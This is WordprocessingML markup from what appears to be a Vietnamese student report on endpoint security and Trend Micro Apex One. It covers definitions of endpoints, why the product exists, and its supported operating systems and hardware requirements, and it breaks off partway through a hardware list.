          <w:instrText xml:space="preserve"> PAGEREF _Toc152795846 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="000B76DB">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>44</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="76B8B8AF" w14:textId="683967DD" w:rsidR="00C17580" w:rsidRDefault="00DC4306" w:rsidP="00DC4306">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="880"/>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc152795847" w:history="1">
        <w:r w:rsidRPr="00CE3112">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>7)</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bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Link Demo:</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc152795847 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="000B76DB">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>48</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00E31ADF" w:rsidRPr="00801041">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EF549B" w14:textId="77777777" w:rsidR="00E31ADF" w:rsidRPr="009B73C7" w:rsidRDefault="00E31ADF" w:rsidP="0004238E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc152795822"/>
      <w:r w:rsidRPr="00801041">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Cơ Sở Lý Thuyết</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="3E1E47A2" w14:textId="425642AE" w:rsidR="00E31ADF" w:rsidRPr="001B14DB" w:rsidRDefault="00E31ADF" w:rsidP="0004238E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc152795823"/>
      <w:r w:rsidRPr="001B14DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Tổng quan về EndPoint và Trend Micro Apex One</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="36DAB119" w14:textId="27C6DEF1" w:rsidR="00B77ADC" w:rsidRPr="00374B9C" w:rsidRDefault="00516001" w:rsidP="002F6166">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc152795824"/>
      <w:r w:rsidRPr="00374B9C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Endpoint:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="2B31A2F2" w14:textId="1B39B3CD" w:rsidR="009E4C1D" w:rsidRDefault="009E4C1D" w:rsidP="001845C0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Endpoint là điểm cuối của một thiết bị (thường là máy tính cá nhân, máy tính bảng, điện thoại di động hoặc các thiết bị khác có kết nối mạng…) hoặc ứng dụng được kết nối từ xa vào mạng hoặc hệ thống của doanh nghiệp. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE5284A" w14:textId="2A44E5C6" w:rsidR="001656E5" w:rsidRPr="00516001" w:rsidRDefault="009E4C1D" w:rsidP="001845C0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Các thiết bị này sẽ giao tiếp dữ liệu thông qua mạng lưới đang được liên kết, có vai trò quan trọng trong việc bảo vệ dữ liệu và hệ thống của tổ chức khỏi các mối đe dọa trực tuyến, đảm bảo rằng chỉ những người được ủy quyền mới có thể truy cập vào dữ liệu quan trọng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B70BBDA" w14:textId="74218CF0" w:rsidR="003E108E" w:rsidRDefault="003E108E" w:rsidP="001845C0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Các thiết bị Endpoint đóng vai trò quan trọng trong cả mạng rộng (WAN) và mạng cục bộ (LAN). Nó có thể là bất kỳ thiết bị nào kết nối vào mạng, bao gồm cả máy in, bộ định tuyến và máy tính chủ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069E6C86" w14:textId="2EE3A467" w:rsidR="003E108E" w:rsidRDefault="003E108E" w:rsidP="001845C0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Mục tiêu chính của bảo mật Endpoint (Endpoint Security) là bảo vệ các thiết bị này khỏi các mối đe dọa trực tuyến. Hiện nay, các giải pháp bảo mật Endpoint đã được phân loại thành nhiều loại khác nhau, như bảo mật cho trung tâm dữ liệu, thiết bị di động, không gian làm việc và thiết bị đặc thù.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2B166F" w14:textId="21EB5E61" w:rsidR="009E4C1D" w:rsidRPr="00516001" w:rsidRDefault="0004238E" w:rsidP="0004238E">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B491F2B" wp14:editId="27B858E3">
            <wp:extent cx="4671060" cy="2444522"/>
            <wp:effectExtent l="19050" t="19050" r="15240" b="13335"/>
            <wp:docPr id="1513845674" name="Picture 151384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9465" cy="2469854"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA102F0" w14:textId="34355543" w:rsidR="00517DFB" w:rsidRPr="00516001" w:rsidRDefault="00517DFB" w:rsidP="0004238E">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Một số thiết bị Endpoint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCA671A" w14:textId="5F8E0ADA" w:rsidR="00516001" w:rsidRPr="003717F4" w:rsidRDefault="00516001" w:rsidP="003717F4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc152795825"/>
      <w:r w:rsidRPr="003717F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Trend Micro Apex One:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="7FF3821C" w14:textId="26317AD0" w:rsidR="008250A4" w:rsidRPr="008250A4" w:rsidRDefault="008250A4" w:rsidP="00583014">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="008250A4">
        <w:t>Nguyên nhân ra đời:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4031F5A7" w14:textId="41EB20DB" w:rsidR="0044024C" w:rsidRDefault="008250A4" w:rsidP="00EB188C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="008250A4">
        <w:t>Nhu cầu sử dụng các thiết bị cá nhân ngày càng nhiều nhưng không có tính bảo mật cao.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05227991" w14:textId="619B24A0" w:rsidR="0044024C" w:rsidRDefault="008250A4" w:rsidP="00EB188C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="008250A4">
        <w:t>Kỹ thuật Signature truyền thống không chống lại được ransomware và các mối đe dọa chưa được biết đến.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083FBA66" w14:textId="311170D5" w:rsidR="00F775DA" w:rsidRPr="00516001" w:rsidRDefault="008250A4" w:rsidP="00EB188C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="008250A4">
        <w:t>Chuyển đổi sang làm việc từ xa dẫn đến tạo môi trường cho kẻ xấu khai thác lỗ hổng, tấn công, đánh cắp thông tin mà người dùng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDD4100" w14:textId="08165539" w:rsidR="0004238E" w:rsidRDefault="001C5F17" w:rsidP="001C5F17">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001C5F17">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Apex One Endpoint Security</w:t>
      </w:r>
      <w:r w:rsidRPr="001C5F17">
        <w:t xml:space="preserve"> hay </w:t>
      </w:r>
      <w:r w:rsidRPr="001C5F17">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Apex One</w:t>
      </w:r>
      <w:r w:rsidRPr="001C5F17">
        <w:t xml:space="preserve"> là giải pháp bảo mật điểm cuối toàn diện của Trend Micro sẽ giúp Doanh nghiệp an tâm trong việc kinh doanh hơn khi các điểm cuối được bảo vệ an toàn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCA4E6A" w14:textId="24F9B127" w:rsidR="001C5F17" w:rsidRPr="00516001" w:rsidRDefault="00FC0553" w:rsidP="00002998">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC0553">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42D5BA0D" wp14:editId="591AE949">
            <wp:extent cx="5943600" cy="2857500"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="19050"/>
            <wp:docPr id="2037272540" name="Picture 2037272540" descr="A timeline of an older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72540" name="Picture 5" descr="A timeline of an older compan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31398083" w14:textId="63AB19AC" w:rsidR="00002998" w:rsidRPr="00516001" w:rsidRDefault="009E0642" w:rsidP="00002998">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quá trình 30 năm nghiêm cứu trong lĩnh vực Endpoint của </w:t>
      </w:r>
      <w:r w:rsidR="00951295" w:rsidRPr="00951295">
        <w:t>Trend Micro</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C24903A" w14:textId="1946E8FC" w:rsidR="002E18D8" w:rsidRPr="00516001" w:rsidRDefault="002E18D8" w:rsidP="002E18D8">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8DB0F0" w14:textId="2FB321F5" w:rsidR="00E31ADF" w:rsidRPr="001B14DB" w:rsidRDefault="00E31ADF" w:rsidP="00A774C9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="eop"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc152795826"/>
      <w:r w:rsidRPr="001B14DB">
        <w:rPr>
          <w:rStyle w:val="eop"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Các yêu cầu cho hệ thống Apex One</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="1B19C20D" w14:textId="4993F84C" w:rsidR="002E18D8" w:rsidRPr="00374B9C" w:rsidRDefault="002E18D8" w:rsidP="00374B9C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc152795827"/>
      <w:r w:rsidRPr="00374B9C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Agent operating system</w:t>
      </w:r>
      <w:r w:rsidR="007B2D27" w:rsidRPr="00374B9C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="463622D2" w14:textId="16E8765B" w:rsidR="002E18D8" w:rsidRDefault="002E18D8" w:rsidP="00C47D27">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Windows 7 (6.1)</w:t>
      </w:r>
      <w:r w:rsidR="007B2D27">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E2B1AD" w14:textId="0593BB7A" w:rsidR="002E18D8" w:rsidRDefault="002E18D8" w:rsidP="00C47D27">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Windows 8/8.1 (6.2/6.3)</w:t>
      </w:r>
      <w:r w:rsidR="007B2D27">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C6F618" w14:textId="2FBA8FB5" w:rsidR="002E18D8" w:rsidRDefault="002E18D8" w:rsidP="00C47D27">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Windows 10 (10.0)</w:t>
      </w:r>
      <w:r w:rsidR="007B2D27">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDBABB1" w14:textId="2327E268" w:rsidR="002E18D8" w:rsidRDefault="002E18D8" w:rsidP="00C47D27">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Windows Server 2008 R2 (6.1)</w:t>
      </w:r>
      <w:r w:rsidR="007B2D27">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09568F41" w14:textId="4C25667A" w:rsidR="002E18D8" w:rsidRDefault="002E18D8" w:rsidP="00C47D27">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Windows Server 2012 (6.2)</w:t>
      </w:r>
      <w:r w:rsidR="007B2D27">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C25DF2" w14:textId="51D94716" w:rsidR="002E18D8" w:rsidRDefault="002E18D8" w:rsidP="00C47D27">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Windows Server 2012 R2 (6.3)</w:t>
      </w:r>
      <w:r w:rsidR="007B2D27">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339AE2A2" w14:textId="1788FEFF" w:rsidR="002E18D8" w:rsidRDefault="002E18D8" w:rsidP="00C47D27">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Windows Server 2016 R2 (10)</w:t>
      </w:r>
      <w:r w:rsidR="007B2D27">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F532E6" w14:textId="7DAB349B" w:rsidR="002E18D8" w:rsidRDefault="002E18D8" w:rsidP="00C47D27">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Windows Server 2019</w:t>
      </w:r>
      <w:r w:rsidR="007B2D27">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AE776B" w14:textId="2C0E1273" w:rsidR="002E18D8" w:rsidRDefault="002E18D8" w:rsidP="00C47D27">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>macOS® Mojave 10.14</w:t>
      </w:r>
      <w:r w:rsidR="007B2D27">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64284A37" w14:textId="32E68E3C" w:rsidR="002E18D8" w:rsidRDefault="002E18D8" w:rsidP="00C47D27">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>macOS High Sierra 10.13</w:t>
      </w:r>
      <w:r w:rsidR="007B2D27">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B4140B" w14:textId="51EB6013" w:rsidR="002E18D8" w:rsidRDefault="002E18D8" w:rsidP="00C47D27">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>macOS Sierra 10.12</w:t>
      </w:r>
      <w:r w:rsidR="007B2D27">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F71D1B3" w14:textId="4DD18F4B" w:rsidR="002E18D8" w:rsidRDefault="002E18D8" w:rsidP="00C47D27">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>OS X® El Capitan 10.11</w:t>
      </w:r>
      <w:r w:rsidR="007B2D27">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C86827D" w14:textId="7B731AA4" w:rsidR="002E18D8" w:rsidRDefault="002E18D8" w:rsidP="00C47D27">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>OS X Yosemite 10.10 or later</w:t>
      </w:r>
      <w:r w:rsidR="007B2D27">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC6E305" w14:textId="0DCAB39C" w:rsidR="00263DFE" w:rsidRPr="00263DFE" w:rsidRDefault="002E18D8" w:rsidP="00C47D27">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>OS X Mavericks 10.9 or later</w:t>
      </w:r>
      <w:r w:rsidR="007B2D27">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA5835D" w14:textId="09082761" w:rsidR="00365834" w:rsidRPr="00374B9C" w:rsidRDefault="00365834" w:rsidP="00374B9C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc152795828"/>
      <w:r w:rsidRPr="00374B9C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Agent Platform</w:t>
      </w:r>
      <w:r w:rsidR="007B2D27" w:rsidRPr="00374B9C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="37AD5995" w14:textId="429CA692" w:rsidR="00365834" w:rsidRDefault="00365834" w:rsidP="008D23F6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Processor: 300 MHz Intel® Pentium® or equivalent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105277F5" w14:textId="40CE0383" w:rsidR="00365834" w:rsidRDefault="00365834" w:rsidP="008D23F6">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>(Windows 7, 8.1, 10 family) and Intel® CoreTM processor for Mac.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D0A8C7" w14:textId="15722692" w:rsidR="00365834" w:rsidRDefault="00365834" w:rsidP="008D23F6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>GHz minimum (2.0 GHz recommended) Intel Pentium or equivalent (Windows Embedded POSReady7).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE7ABAA" w14:textId="206BBFFF" w:rsidR="00365834" w:rsidRDefault="00365834" w:rsidP="008D23F6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
